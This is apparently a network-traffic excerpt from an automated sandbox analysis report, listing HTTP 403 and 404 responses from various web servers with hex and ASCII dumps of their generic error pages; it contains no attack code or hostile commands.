SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff5a1cde8a35ff-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatibl
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HpqRU5RM1vMooFgxGaFf7I,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1685537525.370456717116416680X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:52:05 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:05 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:05 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:20:48 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vGx3L%2BPwVpspvzJL9zcoulxhbE%2FLg0eTEoj0W1NS0L4V390m4PPJKvuqgvwRKCC1et%2BoEYUdrJJPb0omrmUGCzWMQnP070THZ7IV9L17OUl8qEyq5M%2FzJ%2BrITIAxw7ayP5o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a21be2237fd-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:52:06 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: rwzqSZgb/l5XFEAMGData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 